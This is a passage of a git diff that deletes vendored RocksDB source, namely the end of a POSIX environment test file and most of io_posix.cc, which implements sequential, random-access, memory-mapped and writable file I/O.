-  // Close file and reopen it
-  file->Close();
-  ASSERT_OK(env_->NewRandomRWFile(path, &file, EnvOptions()));
-
-  ASSERT_OK(file->Read(0, 9, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ABXXXQQQQ");
-
-  ASSERT_OK(file->Read(10, 3, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ZYZ");
-
-  ASSERT_OK(file->Read(200, 9, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "FFFFFXXXX");
-
-  ASSERT_OK(file->Write(4, "TTTTTTTTTTTTTTTT"));
-  ASSERT_OK(file->Read(0, 10, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ABXXTTTTTT");
-
-  // Clean up
-  env_->DeleteFile(path);
-}
-
-class RandomRWFileWithMirrorString {
- public:
-  explicit RandomRWFileWithMirrorString(RandomRWFile* _file) : file_(_file) {}
-
-  void Write(size_t offset, const std::string& data) {
-    // Write to mirror string
-    StringWrite(offset, data);
-
-    // Write to file
-    Status s = file_->Write(offset, data);
-    ASSERT_OK(s) << s.ToString();
-  }
-
-  void Read(size_t offset = 0, size_t n = 1000000) {
-    Slice str_res(nullptr, 0);
-    if (offset < file_mirror_.size()) {
-      size_t str_res_sz = std::min(file_mirror_.size() - offset, n);
-      str_res = Slice(file_mirror_.data() + offset, str_res_sz);
-      StopSliceAtNull(&str_res);
-    }
-
-    Slice file_res;
-    Status s = file_->Read(offset, n, &file_res, buf_);
-    ASSERT_OK(s) << s.ToString();
-    StopSliceAtNull(&file_res);
-
-    ASSERT_EQ(str_res.ToString(), file_res.ToString()) << offset << " " << n;
-  }
-
-  void SetFile(RandomRWFile* _file) { file_ = _file; }
-
- private:
-  void StringWrite(size_t offset, const std::string& src) {
-    if (offset + src.size() > file_mirror_.size()) {
-      file_mirror_.resize(offset + src.size(), '\0');
-    }
-
-    char* pos = const_cast<char*>(file_mirror_.data() + offset);
-    memcpy(pos, src.data(), src.size());
-  }
-
-  void StopSliceAtNull(Slice* slc) {
-    for (size_t i = 0; i < slc->size(); i++) {
-      if ((*slc)[i] == '\0') {
-        *slc = Slice(slc->data(), i);
-        break;
-      }
-    }
-  }
-
-  char buf_[10000];
-  RandomRWFile* file_;
-  std::string file_mirror_;
-};
-
-TEST_P(EnvPosixTestWithParam, PosixRandomRWFileRandomized) {
-  const std::string path = test::TmpDir(env_) + "/random_rw_file_rand";
-  env_->DeleteFile(path);
-
-  unique_ptr<RandomRWFile> file;
-  ASSERT_OK(env_->NewRandomRWFile(path, &file, EnvOptions()));
-  RandomRWFileWithMirrorString file_with_mirror(file.get());
-
-  Random rnd(301);
-  std::string buf;
-  for (int i = 0; i < 10000; i++) {
-    // Genrate random data
-    test::RandomString(&rnd, 10, &buf);
-
-    // Pick random offset for write
-    size_t write_off = rnd.Next() % 1000;
-    file_with_mirror.Write(write_off, buf);
-
-    // Pick random offset for read
-    size_t read_off = rnd.Next() % 1000;
-    size_t read_sz = rnd.Next() % 20;
-    file_with_mirror.Read(read_off, read_sz);
-
-    if (i % 500 == 0) {
-      // Reopen the file every 500 iters
-      ASSERT_OK(env_->NewRandomRWFile(path, &file, EnvOptions()));
-      file_with_mirror.SetFile(file.get());
-    }
-  }
-
-  // clean up
-  env_->DeleteFile(path);
-}
-
-INSTANTIATE_TEST_CASE_P(DefaultEnvWithoutDirectIO, EnvPosixTestWithParam,
-                        ::testing::Values(std::pair<Env*, bool>(Env::Default(),
-                                                                false)));
-#if !defined(ROCKSDB_LITE)
-INSTANTIATE_TEST_CASE_P(DefaultEnvWithDirectIO, EnvPosixTestWithParam,
-                        ::testing::Values(std::pair<Env*, bool>(Env::Default(),
-                                                                true)));
-#endif  // !defined(ROCKSDB_LITE)
-
-#if !defined(ROCKSDB_LITE) && !defined(OS_WIN)
-static unique_ptr<Env> chroot_env(NewChrootEnv(Env::Default(),
-                                               test::TmpDir(Env::Default())));
-INSTANTIATE_TEST_CASE_P(
-    ChrootEnvWithoutDirectIO, EnvPosixTestWithParam,
-    ::testing::Values(std::pair<Env*, bool>(chroot_env.get(), false)));
-INSTANTIATE_TEST_CASE_P(
-    ChrootEnvWithDirectIO, EnvPosixTestWithParam,
-    ::testing::Values(std::pair<Env*, bool>(chroot_env.get(), true)));
-#endif  // !defined(ROCKSDB_LITE) && !defined(OS_WIN)
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/env/io_posix.cc b/thirdparty/rocksdb/env/io_posix.cc
deleted file mode 100644
index c5b14d3..0000000
--- a/thirdparty/rocksdb/env/io_posix.cc
+++ /dev/null
@@ -1,1028 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifdef ROCKSDB_LIB_IO_POSIX
-#include "env/io_posix.h"
-#include <errno.h>
-#include <fcntl.h>
-#include <algorithm>
-#if defined(OS_LINUX)
-#include <linux/fs.h>
-#endif
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/ioctl.h>
-#include <sys/mman.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#ifdef OS_LINUX
-#include <sys/statfs.h>
-#include <sys/syscall.h>
-#include <sys/sysmacros.h>
-#endif
-#include "env/posix_logger.h"
-#include "monitoring/iostats_context_imp.h"
-#include "port/port.h"
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-// A wrapper for fadvise, if the platform doesn't support fadvise,
-// it will simply return 0.
-int Fadvise(int fd, off_t offset, size_t len, int advice) {
-#ifdef OS_LINUX
-  return posix_fadvise(fd, offset, len, advice);
-#else
-  return 0;  // simply do nothing.
-#endif
-}
-
-namespace {
-size_t GetLogicalBufferSize(int __attribute__((__unused__)) fd) {
-#ifdef OS_LINUX
-  struct stat buf;
-  int result = fstat(fd, &buf);
-  if (result == -1) {
-    return kDefaultPageSize;
-  }
-  if (major(buf.st_dev) == 0) {
-    // Unnamed devices (e.g. non-device mounts), reserved as null device number.
-    // These don't have an entry in /sys/dev/block/. Return a sensible default.
-    return kDefaultPageSize;
-  }
-
-  // Reading queue/logical_block_size does not require special permissions.
-  const int kBufferSize = 100;
-  char path[kBufferSize];
-  char real_path[PATH_MAX + 1];
-  snprintf(path, kBufferSize, "/sys/dev/block/%u:%u", major(buf.st_dev),
-           minor(buf.st_dev));
-  if (realpath(path, real_path) == nullptr) {
-    return kDefaultPageSize;
-  }
-  std::string device_dir(real_path);
-  if (!device_dir.empty() && device_dir.back() == '/') {
-    device_dir.pop_back();
-  }
-  // NOTE: sda3 does not have a `queue/` subdir, only the parent sda has it.
-  // $ ls -al '/sys/dev/block/8:3'
-  // lrwxrwxrwx. 1 root root 0 Jun 26 01:38 /sys/dev/block/8:3 ->
-  // ../../block/sda/sda3
-  size_t parent_end = device_dir.rfind('/', device_dir.length() - 1);
-  if (parent_end == std::string::npos) {
-    return kDefaultPageSize;
-  }
-  size_t parent_begin = device_dir.rfind('/', parent_end - 1);
-  if (parent_begin == std::string::npos) {
-    return kDefaultPageSize;
-  }
-  if (device_dir.substr(parent_begin + 1, parent_end - parent_begin - 1) !=
-      "block") {
-    device_dir = device_dir.substr(0, parent_end);
-  }
-  std::string fname = device_dir + "/queue/logical_block_size";
-  FILE* fp;
-  size_t size = 0;
-  fp = fopen(fname.c_str(), "r");
-  if (fp != nullptr) {
-    char* line = nullptr;
-    size_t len = 0;
-    if (getline(&line, &len, fp) != -1) {
-      sscanf(line, "%zu", &size);
-    }
-    free(line);
-    fclose(fp);
-  }
-  if (size != 0 && (size & (size - 1)) == 0) {
-    return size;
-  }
-#endif
-  return kDefaultPageSize;
-}
-} //  namespace
-
-/*
- * DirectIOHelper
- */
-#ifndef NDEBUG
-namespace {
-
-bool IsSectorAligned(const size_t off, size_t sector_size) {
-  return off % sector_size == 0;
-}
-
-bool IsSectorAligned(const void* ptr, size_t sector_size) {
-  return uintptr_t(ptr) % sector_size == 0;
-}
-
-}
-#endif
-
-/*
- * PosixSequentialFile
- */
-PosixSequentialFile::PosixSequentialFile(const std::string& fname, FILE* file,
-                                         int fd, const EnvOptions& options)
-    : filename_(fname),
-      file_(file),
-      fd_(fd),
-      use_direct_io_(options.use_direct_reads),
-      logical_sector_size_(GetLogicalBufferSize(fd_)) {
-  assert(!options.use_direct_reads || !options.use_mmap_reads);
-}
-
-PosixSequentialFile::~PosixSequentialFile() {
-  if (!use_direct_io()) {
-    assert(file_);
-    fclose(file_);
-  } else {
-    assert(fd_);
-    close(fd_);
-  }
-}
-
-Status PosixSequentialFile::Read(size_t n, Slice* result, char* scratch) {
-  assert(result != nullptr && !use_direct_io());
-  Status s;
-  size_t r = 0;
-  do {
-    r = fread_unlocked(scratch, 1, n, file_);
-  } while (r == 0 && ferror(file_) && errno == EINTR);
-  *result = Slice(scratch, r);
-  if (r < n) {
-    if (feof(file_)) {
-      // We leave status as ok if we hit the end of the file
-      // We also clear the error so that the reads can continue
-      // if a new data is written to the file
-      clearerr(file_);
-    } else {
-      // A partial read with an error: return a non-ok status
-      s = IOError("While reading file sequentially", filename_, errno);
-    }
-  }
-  return s;
-}
-
-Status PosixSequentialFile::PositionedRead(uint64_t offset, size_t n,
-                                           Slice* result, char* scratch) {
-  if (use_direct_io()) {
-    assert(IsSectorAligned(offset, GetRequiredBufferAlignment()));
-    assert(IsSectorAligned(n, GetRequiredBufferAlignment()));
-    assert(IsSectorAligned(scratch, GetRequiredBufferAlignment()));
-  }
-  Status s;
-  ssize_t r = -1;
-  size_t left = n;
-  char* ptr = scratch;
-  assert(use_direct_io());
-  while (left > 0) {
-    r = pread(fd_, ptr, left, static_cast<off_t>(offset));
-    if (r <= 0) {
-      if (r == -1 && errno == EINTR) {
-        continue;
-      }
-      break;
-    }
-    ptr += r;
-    offset += r;
-    left -= r;
-    if (r % static_cast<ssize_t>(GetRequiredBufferAlignment()) != 0) {
-      // Bytes reads don't fill sectors. Should only happen at the end
-      // of the file.
-      break;
-    }
-  }
-  if (r < 0) {
-    // An error: return a non-ok status
-    s = IOError(
-        "While pread " + ToString(n) + " bytes from offset " + ToString(offset),
-        filename_, errno);
-  }
-  *result = Slice(scratch, (r < 0) ? 0 : n - left);
-  return s;
-}
-
-Status PosixSequentialFile::Skip(uint64_t n) {
-  if (fseek(file_, static_cast<long int>(n), SEEK_CUR)) {
-    return IOError("While fseek to skip " + ToString(n) + " bytes", filename_,
-                   errno);
-  }
-  return Status::OK();
-}
-
-Status PosixSequentialFile::InvalidateCache(size_t offset, size_t length) {
-#ifndef OS_LINUX
-  return Status::OK();
-#else
-  if (!use_direct_io()) {
-    // free OS pages
-    int ret = Fadvise(fd_, offset, length, POSIX_FADV_DONTNEED);
-    if (ret != 0) {
-      return IOError("While fadvise NotNeeded offset " + ToString(offset) +
-                         " len " + ToString(length),
-                     filename_, errno);
-    }
-  }
-  return Status::OK();
-#endif
-}
-
-/*
- * PosixRandomAccessFile
- */
-#if defined(OS_LINUX)
-size_t PosixHelper::GetUniqueIdFromFile(int fd, char* id, size_t max_size) {
-  if (max_size < kMaxVarint64Length * 3) {
-    return 0;
-  }
-
-  struct stat buf;
-  int result = fstat(fd, &buf);
-  assert(result != -1);
-  if (result == -1) {
-    return 0;
-  }
-
-  long version = 0;
-  result = ioctl(fd, FS_IOC_GETVERSION, &version);
-  TEST_SYNC_POINT_CALLBACK("GetUniqueIdFromFile:FS_IOC_GETVERSION", &result);
-  if (result == -1) {
-    return 0;
-  }
-  uint64_t uversion = (uint64_t)version;
-
-  char* rid = id;
-  rid = EncodeVarint64(rid, buf.st_dev);
-  rid = EncodeVarint64(rid, buf.st_ino);
-  rid = EncodeVarint64(rid, uversion);
-  assert(rid >= id);
-  return static_cast<size_t>(rid - id);
-}
-#endif
-
-#if defined(OS_MACOSX) || defined(OS_AIX)
-size_t PosixHelper::GetUniqueIdFromFile(int fd, char* id, size_t max_size) {
-  if (max_size < kMaxVarint64Length * 3) {
-    return 0;
-  }
-
-  struct stat buf;
-  int result = fstat(fd, &buf);
-  if (result == -1) {
-    return 0;
-  }
-
-  char* rid = id;
-  rid = EncodeVarint64(rid, buf.st_dev);
-  rid = EncodeVarint64(rid, buf.st_ino);
-  rid = EncodeVarint64(rid, buf.st_gen);
-  assert(rid >= id);
-  return static_cast<size_t>(rid - id);
-}
-#endif
-/*
- * PosixRandomAccessFile
- *
- * pread() based random-access
- */
-PosixRandomAccessFile::PosixRandomAccessFile(const std::string& fname, int fd,
-                                             const EnvOptions& options)
-    : filename_(fname),
-      fd_(fd),
-      use_direct_io_(options.use_direct_reads),
-      logical_sector_size_(GetLogicalBufferSize(fd_)) {
-  assert(!options.use_direct_reads || !options.use_mmap_reads);
-  assert(!options.use_mmap_reads || sizeof(void*) < 8);
-}
-
-PosixRandomAccessFile::~PosixRandomAccessFile() { close(fd_); }
-
-Status PosixRandomAccessFile::Read(uint64_t offset, size_t n, Slice* result,
-                                   char* scratch) const {
-  if (use_direct_io()) {
-    assert(IsSectorAligned(offset, GetRequiredBufferAlignment()));
-    assert(IsSectorAligned(n, GetRequiredBufferAlignment()));
-    assert(IsSectorAligned(scratch, GetRequiredBufferAlignment()));
-  }
-  Status s;
-  ssize_t r = -1;
-  size_t left = n;
-  char* ptr = scratch;
-  while (left > 0) {
-    r = pread(fd_, ptr, left, static_cast<off_t>(offset));
-    if (r <= 0) {
-      if (r == -1 && errno == EINTR) {
-        continue;
-      }
-      break;
-    }
-    ptr += r;
-    offset += r;
-    left -= r;
-    if (use_direct_io() &&
-        r % static_cast<ssize_t>(GetRequiredBufferAlignment()) != 0) {
-      // Bytes reads don't fill sectors. Should only happen at the end
-      // of the file.
-      break;
-    }
-  }
-  if (r < 0) {
-    // An error: return a non-ok status
-    s = IOError(
-        "While pread offset " + ToString(offset) + " len " + ToString(n),
-        filename_, errno);
-  }
-  *result = Slice(scratch, (r < 0) ? 0 : n - left);
-  return s;
-}
-
-Status PosixRandomAccessFile::Prefetch(uint64_t offset, size_t n) {
-  Status s;
-  if (!use_direct_io()) {
-    ssize_t r = 0;
-#ifdef OS_LINUX
-    r = readahead(fd_, offset, n);
-#endif
-#ifdef OS_MACOSX
-    radvisory advice;
-    advice.ra_offset = static_cast<off_t>(offset);
-    advice.ra_count = static_cast<int>(n);
-    r = fcntl(fd_, F_RDADVISE, &advice);
-#endif
-    if (r == -1) {
-      s = IOError("While prefetching offset " + ToString(offset) + " len " +
-                      ToString(n),
-                  filename_, errno);
-    }
-  }
-  return s;
-}
-
-#if defined(OS_LINUX) || defined(OS_MACOSX) || defined(OS_AIX)
-size_t PosixRandomAccessFile::GetUniqueId(char* id, size_t max_size) const {
-  return PosixHelper::GetUniqueIdFromFile(fd_, id, max_size);
-}
-#endif
-
-void PosixRandomAccessFile::Hint(AccessPattern pattern) {
-  if (use_direct_io()) {
-    return;
-  }
-  switch (pattern) {
-    case NORMAL:
-      Fadvise(fd_, 0, 0, POSIX_FADV_NORMAL);
-      break;
-    case RANDOM:
-      Fadvise(fd_, 0, 0, POSIX_FADV_RANDOM);
-      break;
-    case SEQUENTIAL:
-      Fadvise(fd_, 0, 0, POSIX_FADV_SEQUENTIAL);
-      break;
-    case WILLNEED:
-      Fadvise(fd_, 0, 0, POSIX_FADV_WILLNEED);
-      break;
-    case DONTNEED:
-      Fadvise(fd_, 0, 0, POSIX_FADV_DONTNEED);
-      break;
-    default:
-      assert(false);
-      break;
-  }
-}
-
-Status PosixRandomAccessFile::InvalidateCache(size_t offset, size_t length) {
-  if (use_direct_io()) {
-    return Status::OK();
-  }
-#ifndef OS_LINUX
-  return Status::OK();
-#else
-  // free OS pages
-  int ret = Fadvise(fd_, offset, length, POSIX_FADV_DONTNEED);
-  if (ret == 0) {
-    return Status::OK();
-  }
-  return IOError("While fadvise NotNeeded offset " + ToString(offset) +
-                     " len " + ToString(length),
-                 filename_, errno);
-#endif
-}
-
-/*
- * PosixMmapReadableFile
- *
- * mmap() based random-access
- */
-// base[0,length-1] contains the mmapped contents of the file.
-PosixMmapReadableFile::PosixMmapReadableFile(const int fd,
-                                             const std::string& fname,
-                                             void* base, size_t length,
-                                             const EnvOptions& options)
-    : fd_(fd), filename_(fname), mmapped_region_(base), length_(length) {
-  fd_ = fd_ + 0;  // suppress the warning for used variables
-  assert(options.use_mmap_reads);
-  assert(!options.use_direct_reads);
-}
-
-PosixMmapReadableFile::~PosixMmapReadableFile() {
-  int ret = munmap(mmapped_region_, length_);
-  if (ret != 0) {
-    fprintf(stdout, "failed to munmap %p length %" ROCKSDB_PRIszt " \n",
-            mmapped_region_, length_);
-  }
-}
-
-Status PosixMmapReadableFile::Read(uint64_t offset, size_t n, Slice* result,
-                                   char* scratch) const {
-  Status s;
-  if (offset > length_) {
-    *result = Slice();
-    return IOError("While mmap read offset " + ToString(offset) +
-                       " larger than file length " + ToString(length_),
-                   filename_, EINVAL);
-  } else if (offset + n > length_) {
-    n = static_cast<size_t>(length_ - offset);
-  }
-  *result = Slice(reinterpret_cast<char*>(mmapped_region_) + offset, n);
-  return s;
-}
-
-Status PosixMmapReadableFile::InvalidateCache(size_t offset, size_t length) {
-#ifndef OS_LINUX
-  return Status::OK();
-#else
-  // free OS pages
-  int ret = Fadvise(fd_, offset, length, POSIX_FADV_DONTNEED);
-  if (ret == 0) {
-    return Status::OK();
-  }
-  return IOError("While fadvise not needed. Offset " + ToString(offset) +
-                     " len" + ToString(length),
-                 filename_, errno);
-#endif
-}
-
-/*
- * PosixMmapFile
- *
- * We preallocate up to an extra megabyte and use memcpy to append new
- * data to the file.  This is safe since we either properly close the
- * file before reading from it, or for log files, the reading code
- * knows enough to skip zero suffixes.
- */
-Status PosixMmapFile::UnmapCurrentRegion() {
-  TEST_KILL_RANDOM("PosixMmapFile::UnmapCurrentRegion:0", rocksdb_kill_odds);
-  if (base_ != nullptr) {
-    int munmap_status = munmap(base_, limit_ - base_);
-    if (munmap_status != 0) {
-      return IOError("While munmap", filename_, munmap_status);
-    }
-    file_offset_ += limit_ - base_;
-    base_ = nullptr;
-    limit_ = nullptr;
-    last_sync_ = nullptr;
-    dst_ = nullptr;
-
-    // Increase the amount we map the next time, but capped at 1MB
-    if (map_size_ < (1 << 20)) {
-      map_size_ *= 2;
-    }
-  }
-  return Status::OK();
-}
-
-Status PosixMmapFile::MapNewRegion() {
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-  assert(base_ == nullptr);
-  TEST_KILL_RANDOM("PosixMmapFile::UnmapCurrentRegion:0", rocksdb_kill_odds);
-  // we can't fallocate with FALLOC_FL_KEEP_SIZE here
-  if (allow_fallocate_) {
-    IOSTATS_TIMER_GUARD(allocate_nanos);
-    int alloc_status = fallocate(fd_, 0, file_offset_, map_size_);
-    if (alloc_status != 0) {
-      // fallback to posix_fallocate
-      alloc_status = posix_fallocate(fd_, file_offset_, map_size_);
-    }
-    if (alloc_status != 0) {
-      return Status::IOError("Error allocating space to file : " + filename_ +
-                             "Error : " + strerror(alloc_status));
-    }
-  }
-
-  TEST_KILL_RANDOM("PosixMmapFile::Append:1", rocksdb_kill_odds);
-  void* ptr = mmap(nullptr, map_size_, PROT_READ | PROT_WRITE, MAP_SHARED, fd_,
-                   file_offset_);
-  if (ptr == MAP_FAILED) {
-    return Status::IOError("MMap failed on " + filename_);
-  }
-  TEST_KILL_RANDOM("PosixMmapFile::Append:2", rocksdb_kill_odds);
-
-  base_ = reinterpret_cast<char*>(ptr);
-  limit_ = base_ + map_size_;
-  dst_ = base_;
-  last_sync_ = base_;
-  return Status::OK();
-#else
-  return Status::NotSupported("This platform doesn't support fallocate()");
-#endif
-}
-
-Status PosixMmapFile::Msync() {
-  if (dst_ == last_sync_) {
-    return Status::OK();
-  }
-  // Find the beginnings of the pages that contain the first and last
-  // bytes to be synced.
-  size_t p1 = TruncateToPageBoundary(last_sync_ - base_);
-  size_t p2 = TruncateToPageBoundary(dst_ - base_ - 1);
-  last_sync_ = dst_;
-  TEST_KILL_RANDOM("PosixMmapFile::Msync:0", rocksdb_kill_odds);
-  if (msync(base_ + p1, p2 - p1 + page_size_, MS_SYNC) < 0) {
-    return IOError("While msync", filename_, errno);
-  }
-  return Status::OK();
-}
-
-PosixMmapFile::PosixMmapFile(const std::string& fname, int fd, size_t page_size,
-                             const EnvOptions& options)
-    : filename_(fname),
-      fd_(fd),
-      page_size_(page_size),
-      map_size_(Roundup(65536, page_size)),
-      base_(nullptr),
-      limit_(nullptr),
-      dst_(nullptr),
-      last_sync_(nullptr),
-      file_offset_(0) {
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-  allow_fallocate_ = options.allow_fallocate;
-  fallocate_with_keep_size_ = options.fallocate_with_keep_size;
-#endif
-  assert((page_size & (page_size - 1)) == 0);
-  assert(options.use_mmap_writes);
-  assert(!options.use_direct_writes);
-}
-
-PosixMmapFile::~PosixMmapFile() {
-  if (fd_ >= 0) {
-    PosixMmapFile::Close();
-  }
-}
-
-Status PosixMmapFile::Append(const Slice& data) {
-  const char* src = data.data();
-  size_t left = data.size();
-  while (left > 0) {
-    assert(base_ <= dst_);
-    assert(dst_ <= limit_);
-    size_t avail = limit_ - dst_;
-    if (avail == 0) {
-      Status s = UnmapCurrentRegion();
-      if (!s.ok()) {
-        return s;
-      }
-      s = MapNewRegion();
-      if (!s.ok()) {
-        return s;
-      }
-      TEST_KILL_RANDOM("PosixMmapFile::Append:0", rocksdb_kill_odds);
-    }
-
-    size_t n = (left <= avail) ? left : avail;
-    assert(dst_);
-    memcpy(dst_, src, n);
-    dst_ += n;
-    src += n;
-    left -= n;
-  }
-  return Status::OK();
-}
-
-Status PosixMmapFile::Close() {
-  Status s;
-  size_t unused = limit_ - dst_;
-
-  s = UnmapCurrentRegion();
-  if (!s.ok()) {
-    s = IOError("While closing mmapped file", filename_, errno);
-  } else if (unused > 0) {
-    // Trim the extra space at the end of the file
-    if (ftruncate(fd_, file_offset_ - unused) < 0) {
-      s = IOError("While ftruncating mmaped file", filename_, errno);
-    }
-  }
-
-  if (close(fd_) < 0) {
-    if (s.ok()) {
-      s = IOError("While closing mmapped file", filename_, errno);
-    }
-  }
-
-  fd_ = -1;
-  base_ = nullptr;
-  limit_ = nullptr;
-  return s;
-}
-
-Status PosixMmapFile::Flush() { return Status::OK(); }
-
-Status PosixMmapFile::Sync() {
-  if (fdatasync(fd_) < 0) {
-    return IOError("While fdatasync mmapped file", filename_, errno);
-  }
-
-  return Msync();
-}
-
-/**
- * Flush data as well as metadata to stable storage.
- */
-Status PosixMmapFile::Fsync() {
-  if (fsync(fd_) < 0) {
-    return IOError("While fsync mmaped file", filename_, errno);
-  }
-
-  return Msync();
-}
-
-/**
- * Get the size of valid data in the file. This will not match the
- * size that is returned from the filesystem because we use mmap
- * to extend file by map_size every time.
- */
-uint64_t PosixMmapFile::GetFileSize() {
-  size_t used = dst_ - base_;
-  return file_offset_ + used;
-}
-
-Status PosixMmapFile::InvalidateCache(size_t offset, size_t length) {
-#ifndef OS_LINUX
-  return Status::OK();
-#else
-  // free OS pages
-  int ret = Fadvise(fd_, offset, length, POSIX_FADV_DONTNEED);
-  if (ret == 0) {
-    return Status::OK();
-  }
-  return IOError("While fadvise NotNeeded mmapped file", filename_, errno);
-#endif
-}
-
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-Status PosixMmapFile::Allocate(uint64_t offset, uint64_t len) {
-  assert(offset <= std::numeric_limits<off_t>::max());
-  assert(len <= std::numeric_limits<off_t>::max());
-  TEST_KILL_RANDOM("PosixMmapFile::Allocate:0", rocksdb_kill_odds);
-  int alloc_status = 0;
-  if (allow_fallocate_) {
-    alloc_status = fallocate(
-        fd_, fallocate_with_keep_size_ ? FALLOC_FL_KEEP_SIZE : 0,
-          static_cast<off_t>(offset), static_cast<off_t>(len));
-  }
-  if (alloc_status == 0) {
-    return Status::OK();
-  } else {
-    return IOError(
-        "While fallocate offset " + ToString(offset) + " len " + ToString(len),
-        filename_, errno);
-  }
-}
-#endif
-
-/*
- * PosixWritableFile
- *
- * Use posix write to write data to a file.
- */
-PosixWritableFile::PosixWritableFile(const std::string& fname, int fd,
-                                     const EnvOptions& options)
-    : filename_(fname),
-      use_direct_io_(options.use_direct_writes),
-      fd_(fd),
-      filesize_(0),
-      logical_sector_size_(GetLogicalBufferSize(fd_)) {
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-  allow_fallocate_ = options.allow_fallocate;
-  fallocate_with_keep_size_ = options.fallocate_with_keep_size;
-#endif
-  assert(!options.use_mmap_writes);
-}
-
-PosixWritableFile::~PosixWritableFile() {
-  if (fd_ >= 0) {
-    PosixWritableFile::Close();
-  }
-}
-
-Status PosixWritableFile::Append(const Slice& data) {
-  if (use_direct_io()) {
-    assert(IsSectorAligned(data.size(), GetRequiredBufferAlignment()));
-    assert(IsSectorAligned(data.data(), GetRequiredBufferAlignment()));
-  }
-  const char* src = data.data();
-  size_t left = data.size();
-  while (left != 0) {
-    ssize_t done = write(fd_, src, left);
-    if (done < 0) {
-      if (errno == EINTR) {
-        continue;
-      }
-      return IOError("While appending to file", filename_, errno);
-    }
-    left -= done;
-    src += done;
-  }
-  filesize_ += data.size();
-  return Status::OK();
-}
-
-Status PosixWritableFile::PositionedAppend(const Slice& data, uint64_t offset) {
-  if (use_direct_io()) {
-    assert(IsSectorAligned(offset, GetRequiredBufferAlignment()));
-    assert(IsSectorAligned(data.size(), GetRequiredBufferAlignment()));
-    assert(IsSectorAligned(data.data(), GetRequiredBufferAlignment()));
-  }
-  assert(offset <= std::numeric_limits<off_t>::max());
-  const char* src = data.data();
-  size_t left = data.size();
-  while (left != 0) {
-    ssize_t done = pwrite(fd_, src, left, static_cast<off_t>(offset));
-    if (done < 0) {
-      if (errno == EINTR) {
-        continue;
-      }
-      return IOError("While pwrite to file at offset " + ToString(offset),
-                     filename_, errno);
-    }
-    left -= done;
-    offset += done;
-    src += done;
-  }
-  filesize_ = offset;
-  return Status::OK();
-}
-
-Status PosixWritableFile::Truncate(uint64_t size) {
-  Status s;
-  int r = ftruncate(fd_, size);
-  if (r < 0) {
-    s = IOError("While ftruncate file to size " + ToString(size), filename_,
-                errno);
-  } else {
-    filesize_ = size;
-  }
-  return s;
-}
-
-Status PosixWritableFile::Close() {
-  Status s;
-
-  size_t block_size;
-  size_t last_allocated_block;
-  GetPreallocationStatus(&block_size, &last_allocated_block);
-  if (last_allocated_block > 0) {
-    // trim the extra space preallocated at the end of the file
-    // NOTE(ljin): we probably don't want to surface failure as an IOError,
-    // but it will be nice to log these errors.
-    int dummy __attribute__((unused));
-    dummy = ftruncate(fd_, filesize_);
-#if defined(ROCKSDB_FALLOCATE_PRESENT) && !defined(TRAVIS)
-    // in some file systems, ftruncate only trims trailing space if the
-    // new file size is smaller than the current size. Calling fallocate
-    // with FALLOC_FL_PUNCH_HOLE flag to explicitly release these unused
-    // blocks. FALLOC_FL_PUNCH_HOLE is supported on at least the following
-    // filesystems:
-    //   XFS (since Linux 2.6.38)
-    //   ext4 (since Linux 3.0)
-    //   Btrfs (since Linux 3.7)
-    //   tmpfs (since Linux 3.5)
-    // We ignore error since failure of this operation does not affect
-    // correctness.
-    // TRAVIS - this code does not work on TRAVIS filesystems.
-    // the FALLOC_FL_KEEP_SIZE option is expected to not change the size
-    // of the file, but it does. Simple strace report will show that.
-    // While we work with Travis-CI team to figure out if this is a
-    // quirk of Docker/AUFS, we will comment this out.
-    struct stat file_stats;
-    int result = fstat(fd_, &file_stats);
-    // After ftruncate, we check whether ftruncate has the correct behavior.
-    // If not, we should hack it with FALLOC_FL_PUNCH_HOLE
-    if (result == 0 &&
-        (file_stats.st_size + file_stats.st_blksize - 1) /
-            file_stats.st_blksize !=
-        file_stats.st_blocks / (file_stats.st_blksize / 512)) {
-      IOSTATS_TIMER_GUARD(allocate_nanos);
-      if (allow_fallocate_) {
-        fallocate(fd_, FALLOC_FL_KEEP_SIZE | FALLOC_FL_PUNCH_HOLE, filesize_,
-                  block_size * last_allocated_block - filesize_);
-      }
-    }
-#endif
-  }
-
-  if (close(fd_) < 0) {
-    s = IOError("While closing file after writing", filename_, errno);
-  }
-  fd_ = -1;
-  return s;
-}
-
-// write out the cached data to the OS cache
-Status PosixWritableFile::Flush() { return Status::OK(); }
-
-Status PosixWritableFile::Sync() {
-  if (fdatasync(fd_) < 0) {
-    return IOError("While fdatasync", filename_, errno);
-  }
-  return Status::OK();
-}
-
-Status PosixWritableFile::Fsync() {
-  if (fsync(fd_) < 0) {
-    return IOError("While fsync", filename_, errno);
-  }
-  return Status::OK();
-}
-
-bool PosixWritableFile::IsSyncThreadSafe() const { return true; }
-
-uint64_t PosixWritableFile::GetFileSize() { return filesize_; }
-
-Status PosixWritableFile::InvalidateCache(size_t offset, size_t length) {
-  if (use_direct_io()) {
-    return Status::OK();
-  }
-#ifndef OS_LINUX
-  return Status::OK();
-#else
-  // free OS pages
-  int ret = Fadvise(fd_, offset, length, POSIX_FADV_DONTNEED);
-  if (ret == 0) {
-    return Status::OK();
-  }
-  return IOError("While fadvise NotNeeded", filename_, errno);
-#endif
-}
-
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-Status PosixWritableFile::Allocate(uint64_t offset, uint64_t len) {
-  assert(offset <= std::numeric_limits<off_t>::max());
-  assert(len <= std::numeric_limits<off_t>::max());
